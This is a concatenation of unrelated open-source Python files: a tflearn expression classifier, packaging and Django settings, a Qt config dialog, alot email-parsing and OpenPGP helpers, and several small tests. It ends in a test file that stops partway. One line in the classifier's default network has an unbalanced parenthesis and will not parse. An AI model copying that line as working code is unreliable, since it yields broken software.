        self.model = tflearn.DNN(network, checkpoint_path=self.save_path, max_checkpoints=1, tensorboard_verbose=3, tensorboard_dir=self.save_path + 'tensorboard')
    def load(self):
        # Restore trained weights saved by train().
        self.model.load(self.save_path + 'model.model')
    @staticmethod
    def local(input, nb_filters, filter_size, stride, name):
        # Bridge a Keras LocallyConnected2D layer into the tflearn graph:
        # build it against the input shape, then call it on the tensor.
        local = LocallyConnected2D(nb_filters, filter_size, strides=(stride, stride), use_bias=True, kernel_initializer='random_normal', bias_initializer='random_normal', name=name)
        local.build(input.get_shape().as_list())
        return local.call(input)
    def build_network(self, num_classes, input_shape, model):
        """Build and return the Adam/categorical-crossentropy regression
        graph for the requested topology.

        :param num_classes: size of the softmax output layer
        :param input_shape: (height, width, channels) of one input sample
        :param model: 'DeepFace', 'Song', or anything else for the default
        """
        network = tflearn.input_data(shape=[None, input_shape[0], input_shape[1], input_shape[2]])
        if model == 'DeepFace':
            # Conv + pool front-end followed by three locally-connected layers.
            conv_1 = tflearn.relu(tflearn.conv_2d(network, 32, 11, strides=1, padding='VALID', name='Conv2d_1'))
            maxpool_1 = tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1')
            conv_2 = tflearn.relu(tflearn.conv_2d(maxpool_1, 32, 9, strides=1, padding='VALID', name='Conv2d_2'))
            local_1 = tflearn.relu(self.local(conv_2, 16, 9, 1, 'Local_1'))
            local_2 = tflearn.relu(self.local(local_1, 16, 7, 1, 'Local_2'))
            local_3 = tflearn.relu(self.local(local_2, 16, 5, 1, 'Local_3'))
            flatterned = tflearn.flatten(local_3)
            full_1 = tflearn.dropout(tflearn.relu(tflearn.fully_connected(flatterned, 4096, name='Fully_Connected_1')), 0.5)
            output = tflearn.fully_connected(full_1, num_classes, activation='softmax', name='Output')
        elif model == 'Song':
            conv_1 = tflearn.relu(tflearn.conv_2d(network, 64, 5, strides=1, padding='VALID', name='Conv_1'))
            maxpool_1 = tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1')
            conv_2 = tflearn.relu(tflearn.conv_2d(maxpool_1, 64 , 5, strides=1, padding='VALID', name='Conv_2'))
            maxpool_2 = tflearn.max_pool_2d(conv_2, 3, strides=2, padding='VALID', name='MaxPool_2')
            # NOTE(review): dropout keep_prob=1 makes these dropouts no-ops.
            local_1 = tflearn.dropout(tflearn.relu(self.local(maxpool_2, 32, 3, 1, 'Local_1')), 1)
            local_2 = tflearn.dropout(tflearn.relu(self.local(local_1, 32, 3, 1, 'Local_2')), 1)
            flatterned = tflearn.flatten(local_2)
            output = tflearn.fully_connected(flatterned, num_classes, activation='softmax', name='Output')
        else:
            # Default: conv/pool stem + two inception-like "FX" merge blocks.
            conv_1 = tflearn.relu(tflearn.conv_2d(network, 64, 7, strides=2, bias=True, padding='VALID', name='Conv2d_1'))
            maxpool_1 = tflearn.batch_normalization(tflearn.max_pool_2d(conv_1, 3, strides=2, padding='VALID', name='MaxPool_1'))
            conv_2a = tflearn.relu(tflearn.conv_2d(maxpool_1, 96, 1, strides=1, padding='VALID', name='Conv_2a_FX1'))
            maxpool_2a = tflearn.max_pool_2d(maxpool_1, 3, strides=1, padding='VALID', name='MaxPool_2a_FX1')
            conv_2b = tflearn.relu(tflearn.conv_2d(conv_2a, 208, 3, strides=1, padding='VALID', name='Conv_2b_FX1'))
            conv_2c = tflearn.relu(tflearn.conv_2d(maxpool_2a, 64, 1, strides=1, padding='VALID', name='Conv_2c_FX1'))
            FX1_out = tflearn.merge([conv_2b, conv_2c], mode='concat', axis=3, name='FX1_out')
            conv_3a = tflearn.relu(tflearn.conv_2d(FX1_out, 96, 1, strides=1, padding='VALID', name='Conv_3a_FX2'))
            maxpool_3a = tflearn.max_pool_2d(FX1_out, 3, strides=1, padding='VALID', name='MaxPool_3a_FX2'))
            conv_3b = tflearn.relu(tflearn.conv_2d(conv_3a, 208, 3, strides=1, padding='VALID', name='Conv_3b_FX2'))
            conv_3c = tflearn.relu(tflearn.conv_2d(maxpool_3a, 64, 1, strides=1, padding='VALID', name='Conv_3c_FX2'))
            FX2_out = tflearn.merge([conv_3b, conv_3c], mode='concat', axis=3, name='FX2_out')
            net = tflearn.flatten(FX2_out)
            output = tflearn.fully_connected(net, num_classes, activation='softmax', name='Output')
        return tflearn.regression(output, optimizer='Adam', loss='categorical_crossentropy', learning_rate=0.000001)
    def train(self, training_data, testing_data):
        """Fit on (input, label) pairs, persist the model and report a
        confusion matrix/classification report on `testing_data`."""
        x, y = [m[0] for m in training_data], [n[1] for n in training_data]
        monitor = MonitorCallback(self.args, self.start_time)
        self.model.fit(x, y, n_epoch=self.args.epochs, validation_set=0.1, shuffle=True, show_metric=True, batch_size=self.args.batch_size, snapshot_step=2000, snapshot_epoch=True,
                       run_id=self.args.model_name, callbacks=monitor)
        main.log(self.args, '{:.5f}s '.format(time.clock() - self.start_time) + str(self.count_trainable_vars()) + ' trainable parameters')
        self.model.save(self.save_path + 'model.model')
        predictions, labels = self.evaluate(testing_data)
        self.confusion_matrix(self.args, predictions, labels)
    def classify(self, data):
        # Raw model predictions (class probability vectors).
        return self.model.predict(data)
    def evaluate(self, testing_data):
        """Return (predictions, labels) for every (input, label) pair."""
        predictions = []
        for data in testing_data:
            predictions.append((self.model.predict([data[0]]), data[1]))
        return [m[0] for m in predictions], [n[1] for n in predictions]
    def load_model(self):
        # Same as load(); kept for API compatibility.
        self.model.load(self.save_path + 'model.model')
    @staticmethod
    def count_trainable_vars():
        """Return the total number of trainable scalar parameters."""
        total_parameters = 0
        for variable in tf.trainable_variables():
            shape = variable.get_shape()
            variable_parametes = 1
            for dim in shape:
                variable_parametes *= dim.value
            total_parameters += variable_parametes
        return total_parameters
    @staticmethod
    def confusion_matrix(args, predictions, labels):
        """Log accuracy, a crosstab confusion matrix and a classification
        report for one-hot `labels` vs. probability `predictions`."""
        # Convert one-hot labels to class indices.
        y_actu = np.zeros(len(labels))
        for i in range(len(labels)):
            for j in range(len(labels[i])):
                if labels[i][j] == 1.00:
                    y_actu[i] = j
        # Convert probability vectors to predicted class indices.
        y_pred = np.zeros(len(predictions))
        for i in range(len(predictions)):
            y_pred[i] = np.argmax(predictions[i])
        p_labels = pd.Series(y_pred)
        t_labels = pd.Series(y_actu)
        df_confusion = pd.crosstab(t_labels, p_labels, rownames=['Actual'], colnames=['Predicted'], margins=True)
        main.log(args, '\nAccuracy = ' + str(accuracy_score(y_true=y_actu, y_pred=y_pred, normalize=True)) + '\n')
        main.log(args, df_confusion)
        main.log(args, ' ')
        main.log(args, classification_report(y_actu, y_pred))
    @staticmethod
    def split_data(seq, num):
        """Split `seq` into consecutive chunks of at most `num` elements.

        NOTE(review): num <= 0 never advances `count` and loops forever.
        """
        count, out = -1, []
        while count < len(seq):
            temp = []
            for i in range(num):
                count += 1
                if count >= len(seq):
                    break
                temp.append(seq[count])
            if len(temp) != 0:
                out.append(temp)
        return out
|
jmcjacob/EmotionalExpressionClassifier
|
classifier.py
|
Python
|
gpl-3.0
| 7,316
|
__all__ = ['os2']
|
rocky/pyimport-relative
|
test/__init__.py
|
Python
|
gpl-3.0
| 18
|
from setuptools import setup, find_packages
# Package metadata and runtime dependencies for pcntoolkit.
setup(name='pcntoolkit',
      version='0.20',
      description='Predictive Clinical Neuroscience toolkit',
      url='http://github.com/amarquand/nispat',
      author='Andre Marquand',
      author_email='a.marquand@donders.ru.nl',
      license='GNU GPLv3',
      packages=find_packages(),
      install_requires=[
          'argparse',
          'nibabel>=2.5.1',
          'six',
          # Fix: the PyPI distribution name is 'scikit-learn'; the old
          # 'sklearn' alias is deprecated and its installation now fails.
          'scikit-learn',
          'bspline',
          'matplotlib',
          'numpy>=1.19.5',
          'scipy>=1.3.2',
          'pandas>=0.25.3',
          'torch>=1.1.0',
          'sphinx-tabs',
          'pymc3>=3.8,<=3.9.3',
          'theano==1.0.5',
          'arviz==0.11.0'
      ],
      zip_safe=False)
|
amarquand/nispat
|
setup.py
|
Python
|
gpl-3.0
| 747
|
import uuid

# Minimal Django settings for the CI test run.
# SECRET_KEY only needs to be non-empty and unpredictable here; Django
# expects a string, so convert the UUID explicitly instead of assigning
# the uuid.UUID object itself.
SECRET_KEY = str(uuid.uuid4())

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'travis_ci_db',
        # Default Travis CI PostgreSQL credentials (empty password).
        'USER': 'travis',
        'PASSWORD': '',
        'HOST': '127.0.0.1',
    }
}

MIDDLEWARE_CLASSES = ()

INSTALLED_APPS = (
    'test_models',
)
|
yavia/django-namedtuples
|
django_settings.py
|
Python
|
gpl-3.0
| 317
|
# Print Fibonacci numbers (1 1 2 3 5 ...); the count is read from stdin.
n=int(input())-1
a=1
b=1
i=1
# The first two Fibonacci numbers are both 1.
# NOTE(review): for input 1 this still prints two numbers -- confirm intended.
print(a)
print(a)
# Each subsequent number is the sum of the previous two.
while i<n:
    c=a
    a=a+b
    b=c
    i=i+1
    print(a)
|
ComputersMania/python-stuff
|
fibonacci.py
|
Python
|
gpl-3.0
| 91
|
#-----------------------------------------------------------------------------
# Copyright (c) 2015-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Hook for the pyopencl module: https://github.com/pyopencl/pyopencl
from PyInstaller.utils.hooks import copy_metadata, collect_data_files
# Bundle both pyopencl's distribution metadata (presumably queried at
# runtime via pkg_resources/importlib.metadata -- confirm) and its
# package data files so the frozen app can find them.
datas = copy_metadata('pyopencl')
datas += collect_data_files('pyopencl')
|
etherkit/OpenBeacon2
|
client/linux-arm/venv/lib/python3.6/site-packages/PyInstaller/hooks/hook-pyopencl.py
|
Python
|
gpl-3.0
| 722
|
# Copyright (C) 2011 Equinor ASA, Norway.
#
# The file 'newconfig.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
import os
from qtpy.QtCore import Qt, QSize
from qtpy.QtWidgets import (
QDialog,
QFormLayout,
QLabel,
QDialogButtonBox,
QSpinBox,
QLineEdit,
QWidget,
)
def createSpace(size=5):
    """Return an empty widget with a minimum size of `size` x `size`
    pixels, usable as spacing on a panel."""
    spacer = QWidget()
    spacer.setMinimumSize(QSize(size, size))
    return spacer
class NewConfigurationDialog(QDialog):
    """A dialog for selecting defaults for a new configuration."""
    def __init__(self, configuration_path, parent=None):
        """
        :param configuration_path: target path for the new config file; a
            bare file name is resolved against the current working directory
        :param parent: optional parent widget
        """
        QDialog.__init__(self, parent)
        self.setModal(True)
        self.setWindowTitle("New configuration file")
        self.setMinimumWidth(250)
        self.setMinimumHeight(150)
        layout = QFormLayout()
        directory, filename = os.path.split(configuration_path)
        # Resolve a missing directory part against the current directory.
        if directory.strip() == "":
            directory = os.path.abspath(os.curdir)
            self.configuration_path = "%s/%s" % (directory, filename)
        else:
            self.configuration_path = configuration_path
        configuration_location = QLabel()
        configuration_location.setText(directory)
        configuration_name = QLabel()
        configuration_name.setText(filename)
        # Number of ensemble realizations: 1..1000, defaulting to 10.
        self.num_realizations = QSpinBox()
        self.num_realizations.setMinimum(1)
        self.num_realizations.setMaximum(1000)
        self.num_realizations.setValue(10)
        self.storage_path = QLineEdit()
        self.storage_path.setText("Storage")
        # Re-validate (enable/disable the OK button) on every edit.
        self.storage_path.textChanged.connect(self._validateName)
        layout.addRow(createSpace(10))
        layout.addRow("Configuration name:", configuration_name)
        layout.addRow("Configuration location:", configuration_location)
        layout.addRow("Path to store DBase:", self.storage_path)
        layout.addRow("Number of realizations", self.num_realizations)
        layout.addRow(createSpace(10))
        buttons = QDialogButtonBox(
            QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal, self
        )
        self.ok_button = buttons.button(QDialogButtonBox.Ok)
        layout.addRow(buttons)
        buttons.accepted.connect(self.accept)
        buttons.rejected.connect(self.reject)
        self.setLayout(layout)
    def getNumberOfRealizations(self):
        """Return the selected number of realizations."""
        return self.num_realizations.value()
    def getConfigurationPath(self):
        """Return the configuration file path (absolute when no directory
        part was supplied)."""
        return self.configuration_path
    def getStoragePath(self):
        """Return the DBase storage path"""
        return str(self.storage_path.text()).strip()
    def _validateName(self, name):
        # OK is enabled only for a non-empty storage path without spaces.
        name = str(name)
        enabled = len(name) > 0 and name.find(" ") == -1
        self.ok_button.setEnabled(enabled)
|
joakim-hove/ert
|
ert_gui/newconfig.py
|
Python
|
gpl-3.0
| 3,342
|
# -*- coding: UTF-8 -*-
def frekvencijska_distribucija(sekvenca):
    """Return a dict mapping each element of `sekvenca` to its number of
    occurrences (frequency distribution)."""
    brojac = {}
    for clan in sekvenca:
        if clan in brojac:
            brojac[clan] += 1
        else:
            brojac[clan] = 1
    return brojac
def sortiraj_distribuciju(rjecnik):
    """Return (element, count) pairs of `rjecnik` sorted by descending
    count; ties keep the dict's iteration order (sort is stable, and
    stability is preserved with reverse=True)."""
    parovi = list(rjecnik.items())
    parovi.sort(key=lambda par: par[1], reverse=True)
    return parovi
def opojavnici(niz):
    """Tokenize `niz` into word tokens (runs of word characters,
    unicode-aware)."""
    import re
    uzorak = re.compile(r'\w+', re.UNICODE)
    return uzorak.findall(niz)
# testing: smoke checks run only when the module is executed directly
# (Python 2 `print` statements).
if __name__=='__main__':
    print frekvencijska_distribucija('neki niz znakova')
    print frekvencijska_distribucija([1,2,2,3,3,3,4,4,4,4,])
    print sortiraj_distribuciju({'a':3,'b':8,'c':5})
    print opojavnici('neki niz znakova')
    print opojavnici('Neki neki niz znakova')
|
nljubesi/python-for-linguists
|
funkcije.py
|
Python
|
gpl-3.0
| 613
|
class Filter():
    '''
    A generic filter class defining a base interface for other classes
    performing filtering operations.

    Currently defines no methods; subclasses such as :class:`BoxFilter`
    add the actual selection logic.
    '''
    pass
class BoxFilter(Filter):
    '''
    Filter that selects data elements lying inside a rectangular
    geographic area.
    '''

    def __init__(self, box, access_lat, access_lng):
        '''
        :param box: a tuple or Box object describing the selection area by
            two points, the top-left (x1) and bottom-right (x2); as a
            tuple the order is::

                (x1.lat, x1.lng, x2.lat, x2.lng)
        :param lambda access_lat: callable returning the latitude of a
            supplied data element.
        :param lambda access_lng: callable returning the longitude of a
            supplied data element.
        '''
        self.box = box  # TODO: convert to Box class
        self.access_lat, self.access_lng = access_lat, access_lng
class ImposmBoxFilter(BoxFilter):
    '''
    BoxFilter preconfigured for imposm-style nodes, whose coordinates are
    stored as ``node[2] == (lat, lng)``.
    '''

    def __init__(self, box):
        '''
        :param box: a tuple or Box object describing the selection area by
            its top-left point (x1) and bottom-right point (x2); as a
            tuple the order is ``(x1.lat, x1.lng, x2.lat, x2.lng)``.
        '''
        super().__init__(box,
                         access_lat=lambda node: node[2][0],
                         access_lng=lambda node: node[2][1])
|
austinhartzheim/sift
|
sift/filter.py
|
Python
|
gpl-3.0
| 1,369
|
# Copyright (C) 2011-2012 Patrick Totzke <patricktotzke@gmail.com>
# This file is released under the GNU GPL, version 3 or a later revision.
# For further details see the COPYING file
import os
import email
import email.charset as charset
from email.header import Header
from email.iterators import typed_subpart_iterator
import tempfile
import re
import logging
import mailcap
from cStringIO import StringIO
from .. import crypto
from .. import helper
from ..errors import GPGProblem
from ..settings import settings
from ..helper import string_sanitize
from ..helper import string_decode
from ..helper import parse_mailcap_nametemplate
from ..helper import split_commandstring
# Use quoted-printable (QP) for both header and body encoding of utf-8
# payloads instead of the default base64.
charset.add_charset('utf-8', charset.QP, charset.QP, 'utf-8')
# Pseudo headers injected into parsed mails to carry OpenPGP signature
# verification results (see add_signature_headers / message_from_file).
X_SIGNATURE_VALID_HEADER = 'X-Alot-OpenPGP-Signature-Valid'
X_SIGNATURE_MESSAGE_HEADER = 'X-Alot-OpenPGP-Signature-Message'
def add_signature_headers(mail, sigs, error_msg):
    '''Add pseudo headers to the mail indicating whether the signature
    verification was successful.

    :param mail: :class:`email.message.Message` the message to entitle
    :param sigs: list of :class:`gpgme.Signature`
    :param error_msg: `str` containing an error message, the empty
          string indicating no error
    '''
    sig_from = ''
    # Defensive default; overwritten below whenever a key lookup runs.
    uid_trusted = False
    if len(sigs) == 0:
        error_msg = error_msg or 'no signature found'
    else:
        try:
            key = crypto.get_key(sigs[0].fpr)
            for uid in key.uids:
                if crypto.check_uid_validity(key, uid.email):
                    sig_from = uid.uid
                    uid_trusted = True
                    break
            else:
                # No trusted uid found, we did not break but drop from the
                # for loop.
                uid_trusted = False
                sig_from = key.uids[0].uid
        except Exception:
            # Fix: was a bare `except:`, which also swallows
            # KeyboardInterrupt/SystemExit. Fall back to the fingerprint.
            sig_from = sigs[0].fpr
            uid_trusted = False
    mail.add_header(
        X_SIGNATURE_VALID_HEADER,
        'False' if error_msg else 'True',
    )
    mail.add_header(
        X_SIGNATURE_MESSAGE_HEADER,
        u'Invalid: {0}'.format(error_msg)
        if error_msg else
        u'Valid: {0}'.format(sig_from)
        if uid_trusted else
        u'Untrusted: {0}'.format(sig_from)
    )
def get_params(mail, failobj=None, header='content-type', unquote=True):
    '''Get Content-Type parameters as dict.

    RFC 2045 specifies that parameter names are case-insensitive, so
    keys are lower-cased here.

    :param mail: :class:`email.message.Message`
    :param failobj: object handed to `Message.get_params` and iterated
        when the header is missing
    :param header: the header to search for parameters, default
    :param unquote: unquote the values
    :returns: a `dict` containing the parameters
    '''
    raw_params = mail.get_params(failobj or [], header, unquote)
    return dict((key.lower(), value) for key, value in raw_params)
def message_from_file(handle):
    '''Reads a mail from the given file-like object and returns an email
    object, very much like email.message_from_file. In addition to
    that OpenPGP encrypted data is detected and decrypted. If this
    succeeds, any mime messages found in the recovered plaintext
    message are added to the returned message object.

    :param handle: a file-like object
    :returns: :class:`email.message.Message` possibly augmented with
              decrypted data
    '''
    m = email.message_from_file(handle)
    # make sure noone smuggles a token in (data from m is untrusted)
    del m[X_SIGNATURE_VALID_HEADER]
    del m[X_SIGNATURE_MESSAGE_HEADER]
    p = get_params(m)
    app_pgp_sig = 'application/pgp-signature'
    app_pgp_enc = 'application/pgp-encrypted'
    # handle OpenPGP signed data
    if (m.is_multipart() and
            m.get_content_subtype() == 'signed' and
            p.get('protocol') == app_pgp_sig):
        # RFC 3156 is quite strict:
        # * exactly two messages
        # * the second is of type 'application/pgp-signature'
        # * the second contains the detached signature
        malformed = False
        if len(m.get_payload()) != 2:
            malformed = u'expected exactly two messages, got {0}'.format(
                len(m.get_payload()))
        else:
            ct = m.get_payload(1).get_content_type()
            if ct != app_pgp_sig:
                malformed = u'expected Content-Type: {0}, got: {1}'.format(
                    app_pgp_sig, ct)
            # TODO: RFC 3156 says the alg has to be lower case, but I've
            # seen a message with 'PGP-'. maybe we should be more
            # permissive here, or maybe not, this is crypto stuff...
            if not p.get('micalg', 'nothing').startswith('pgp-'):
                malformed = u'expected micalg=pgp-..., got: {0}'.format(
                    p.get('micalg', 'nothing'))
        sigs = []
        if not malformed:
            try:
                sigs = crypto.verify_detached(m.get_payload(0).as_string(),
                                              m.get_payload(1).get_payload())
            except GPGProblem as e:
                # unicode() -- this module targets Python 2 (cStringIO above)
                malformed = unicode(e)
        add_signature_headers(m, sigs, malformed)
    # handle OpenPGP encrypted data
    elif (m.is_multipart() and
            m.get_content_subtype() == 'encrypted' and
            p.get('protocol') == app_pgp_enc and
            'Version: 1' in m.get_payload(0).get_payload()):
        # RFC 3156 is quite strict:
        # * exactly two messages
        # * the first is of type 'application/pgp-encrypted'
        # * the first contains 'Version: 1'
        # * the second is of type 'application/octet-stream'
        # * the second contains the encrypted and possibly signed data
        malformed = False
        ct = m.get_payload(0).get_content_type()
        if ct != app_pgp_enc:
            malformed = u'expected Content-Type: {0}, got: {1}'.format(
                app_pgp_enc, ct)
        want = 'application/octet-stream'
        ct = m.get_payload(1).get_content_type()
        if ct != want:
            malformed = u'expected Content-Type: {0}, got: {1}'.format(want,
                                                                       ct)
        if not malformed:
            try:
                sigs, d = crypto.decrypt_verify(m.get_payload(1).get_payload())
            except GPGProblem as e:
                # signature verification failures end up here too if
                # the combined method is used, currently this prevents
                # the interpretation of the recovered plain text
                # mail. maybe that's a feature.
                malformed = unicode(e)
            else:
                # parse decrypted message
                n = message_from_string(d)
                # add the decrypted message to m. note that n contains
                # all the attachments, no need to walk over n here.
                m.attach(n)
                # add any defects found
                m.defects.extend(n.defects)
                # there are two methods for both signed and encrypted
                # data, one is called 'RFC 1847 Encapsulation' by
                # RFC 3156, and one is the 'Combined method'.
                if len(sigs) == 0:
                    # 'RFC 1847 Encapsulation', the signature is a
                    # detached signature found in the recovered mime
                    # message of type multipart/signed.
                    if X_SIGNATURE_VALID_HEADER in n:
                        for k in (X_SIGNATURE_VALID_HEADER,
                                  X_SIGNATURE_MESSAGE_HEADER):
                            m[k] = n[k]
                    else:
                        # an encrypted message without signatures
                        # should arouse some suspicion, better warn
                        # the user
                        add_signature_headers(m, [], 'no signature found')
                else:
                    # 'Combined method', the signatures are returned
                    # by the decrypt_verify function.
                    # note that if we reached this point, we know the
                    # signatures are valid. if they were not valid,
                    # the else block of the current try would not have
                    # been executed
                    add_signature_headers(m, sigs, '')
    # Attach a human-readable error note when the OpenPGP structure was bad.
    if malformed:
        msg = u'Malformed OpenPGP message: {0}'.format(malformed)
        content = email.message_from_string(msg.encode('utf-8'))
        content.set_charset('utf-8')
        m.attach(content)
    return m
def message_from_string(s):
    '''Reads a mail from the given string. This is the equivalent of
    :func:`email.message_from_string` which does nothing but to wrap
    the given string in a StringIO object and to call
    :func:`email.message_from_file`.

    Please refer to the documentation of :func:`message_from_file` for
    details.

    :param s: the complete mail as a string
    :returns: :class:`email.message.Message`, possibly augmented with
        decrypted OpenPGP payloads (see :func:`message_from_file`)
    '''
    return message_from_file(StringIO(s))
def extract_headers(mail, headers=None):
    """
    returns subset of this messages headers as human-readable format:
    all header values are decoded, the resulting string has
    one line "KEY: VALUE" for each requested header present in the mail.

    :param mail: the mail to use
    :type mail: :class:`email.Message`
    :param headers: headers to extract; defaults to all headers of `mail`
    :type headers: list of str
    """
    headertext = u''
    if headers is None:
        # Python 2 dict API on Message (this module targets py2: see the
        # cStringIO import at the top of the file).
        headers = mail.iterkeys()
    for key in headers:
        value = u''
        if key in mail:
            value = decode_header(mail.get(key, ''))
        # Requested-but-absent headers still yield a "KEY: " line.
        headertext += '%s: %s\n' % (key, value)
    return headertext
def extract_body(mail, types=None, field_key='copiousoutput'):
    """
    returns a body text string for given mail.
    If types is `None`, `text/*` is used:
    The exact preferred type is specified by the prefer_plaintext config option
    which defaults to text/html.

    Non-text parts are rendered through the matching mailcap handler
    (looked up with `field_key`), either via a temp file or stdin.

    :param mail: the mail to use
    :type mail: :class:`email.Message`
    :param types: mime content types to use for body string
    :type types: list of str
    """
    preferred = 'text/plain' if settings.get(
        'prefer_plaintext') else 'text/html'
    has_preferred = False
    # see if the mail has our preferred type
    if types is None:
        has_preferred = list(typed_subpart_iterator(
            mail, *preferred.split('/')))
    body_parts = []
    for part in mail.walk():
        ctype = part.get_content_type()
        if types is not None:
            if ctype not in types:
                continue
        # skip explicit attachments -- they are not part of the body
        cd = part.get('Content-Disposition', '')
        if cd.startswith('attachment'):
            continue
        # if the mail has our preferred type, we only keep this type
        # note that if types != None, has_preferred always stays False
        if has_preferred and ctype != preferred:
            continue
        enc = part.get_content_charset() or 'ascii'
        raw_payload = part.get_payload(decode=True)
        if ctype == 'text/plain':
            raw_payload = string_decode(raw_payload, enc)
            body_parts.append(string_sanitize(raw_payload))
        else:
            # get mime handler
            _, entry = settings.mailcap_find_match(ctype, key=field_key)
            tempfile_name = None
            stdin = None
            if entry:
                handler_raw_commandstring = entry['view']
                # in case the mailcap defined command contains no '%s',
                # we pipe the files content to the handling command via stdin
                if '%s' in handler_raw_commandstring:
                    # open tempfile, respect mailcaps nametemplate
                    nametemplate = entry.get('nametemplate', '%s')
                    prefix, suffix = parse_mailcap_nametemplate(nametemplate)
                    with tempfile.NamedTemporaryFile(
                            delete=False, prefix=prefix, suffix=suffix) \
                            as tmpfile:
                        tmpfile.write(raw_payload)
                        tempfile_name = tmpfile.name
                else:
                    stdin = raw_payload
                # read parameter, create handler command
                parms = tuple('='.join(p) for p in part.get_params())
                # create and call external command
                cmd = mailcap.subst(entry['view'], ctype,
                                    filename=tempfile_name, plist=parms)
                logging.debug('command: %s', cmd)
                logging.debug('parms: %s', str(parms))
                cmdlist = split_commandstring(cmd)
                # call handler
                rendered_payload, _, _ = helper.call_cmd(cmdlist, stdin=stdin)
                # remove tempfile
                if tempfile_name:
                    os.unlink(tempfile_name)
                if rendered_payload:  # handler had output
                    body_parts.append(string_sanitize(rendered_payload))
    return u'\n\n'.join(body_parts)
def decode_header(header, normalize=False):
    """
    decode a header value to a unicode string

    values are usually a mixture of different substrings
    encoded in quoted printable using different encodings.
    This turns it into a single unicode string

    :param header: the header value
    :type header: str
    :param normalize: replace trailing spaces after newlines
    :type normalize: bool
    :rtype: unicode
    """
    # If the value isn't ascii as RFC2822 prescribes,
    # we just return the unicode bytestring as is
    value = string_decode(header)  # convert to unicode
    try:
        value = value.encode('ascii')
    except UnicodeEncodeError:
        return value
    # some mailers send out incorrectly escaped headers
    # and double quote the escaped realname part again. remove those
    # RFC: 2047
    regex = r'"(=\?.+?\?.+?\?[^ ?]+\?=)"'
    value = re.sub(regex, r'\1', value)
    logging.debug("unquoted header: |%s|", value)
    # otherwise we interpret RFC2822 encoding escape sequences
    valuelist = email.header.decode_header(value)
    decoded_list = []
    for v, enc in valuelist:
        v = string_decode(v, enc)
        decoded_list.append(string_sanitize(v))
    value = u' '.join(decoded_list)
    if normalize:
        # collapse folded-header continuation whitespace into single spaces
        value = re.sub(r'\n\s+', r' ', value)
    return value
def encode_header(key, value):
    """
    encodes a unicode string as a valid header value

    :param key: the header field this value will be stored in
    :type key: str
    :param value: the value to be encoded
    :type value: unicode
    :returns: the encoded header value
    :rtype: :class:`email.header.Header`
    """
    # handle list of "realname <email>" entries separately
    if key.lower() in ['from', 'to', 'cc', 'bcc']:
        rawentries = value.split(',')
        encodedentries = []
        for entry in rawentries:
            m = re.search(r'\s*(.*)\s+<(.*\@.*\.\w*)>\s*$', entry)
            if m:  # If a realname part is contained
                name, address = m.groups()
                # try to encode as ascii, if that fails, revert to utf-8
                # name must be a unicode string here
                namepart = Header(name)
                # rebuild the entry with the address part kept as ascii
                entry = '%s <%s>' % (namepart.encode(), address)
            # BUGFIX: entries without a realname part (plain addresses)
            # were previously dropped; keep them unchanged instead.
            encodedentries.append(entry)
        value = Header(', '.join(encodedentries))
    else:
        value = Header(value)
    return value
def is_subdir_of(subpath, superpath):
    """Return True if `subpath` equals or lies inside `superpath`.

    Both paths are canonicalized with :func:`os.path.realpath` first,
    so relative segments and symlinks are resolved.
    """
    # make both absolute
    superpath = os.path.realpath(superpath)
    subpath = os.path.realpath(subpath)
    # BUGFIX: os.path.commonprefix compares character-wise, so
    # '/a/bc' was wrongly reported as inside '/a/b'.  Compare whole
    # path components instead: either both paths are identical, or
    # subpath starts with superpath followed by a separator.
    return (subpath == superpath
            or subpath.startswith(superpath.rstrip(os.sep) + os.sep))
|
dcbaker/alot
|
alot/db/utils.py
|
Python
|
gpl-3.0
| 15,715
|
"""Utiliary classes for testing."""
from financeager import clients, config
class Client(clients.LocalServerClient):
    """Implementation that assigns dummy sinks to consume the client's output.

    The underlying Proxy is patched to store data in memory instead of in
    financeager.DATA_DIR.
    """

    def __init__(self):
        def discard(message):
            """Swallow any output handed to the client sinks."""
            return None

        super().__init__(
            configuration=config.Configuration(),
            sinks=clients.Client.Sinks(discard, discard),
        )
        # data_dir=None keeps the proxy's data in memory only
        self.proxy._pocket_kwargs["data_dir"] = None
|
pylipp/financeager
|
test/utils.py
|
Python
|
gpl-3.0
| 531
|
# -*- coding: utf-8 -*-
# Author: Petr Dlouhý <petr.dlouhy@auto-mat.cz>
#
# Copyright (C) 2017 o.s. Auto*Mat
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import datetime
from django.test import TestCase
from freezegun import freeze_time
from model_mommy import mommy
from model_mommy.recipe import Recipe
from ..utils import ICON_FALSE
from aklub.models import DonorPaymentChannel, Profile
@freeze_time("2010-5-1")
class TestNoUpgrade(TestCase):
"""Test TerminalCondition.no_upgrade()"""
def setUp(self):
self.administrative_unit = mommy.make(
"aklub.AdministrativeUnit",
name="test",
)
self.bank_account = mommy.make(
"aklub.BankAccount",
administrative_unit=self.administrative_unit,
)
self.event = mommy.make(
"events.event",
administrative_units=[
self.administrative_unit,
],
)
def test_not_regular(self):
"""Test DonorPaymentChannel with regular_payments=False returns False"""
for model in Profile.__subclasses__():
model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = mommy.make(
"aklub.DonorPaymentChannel",
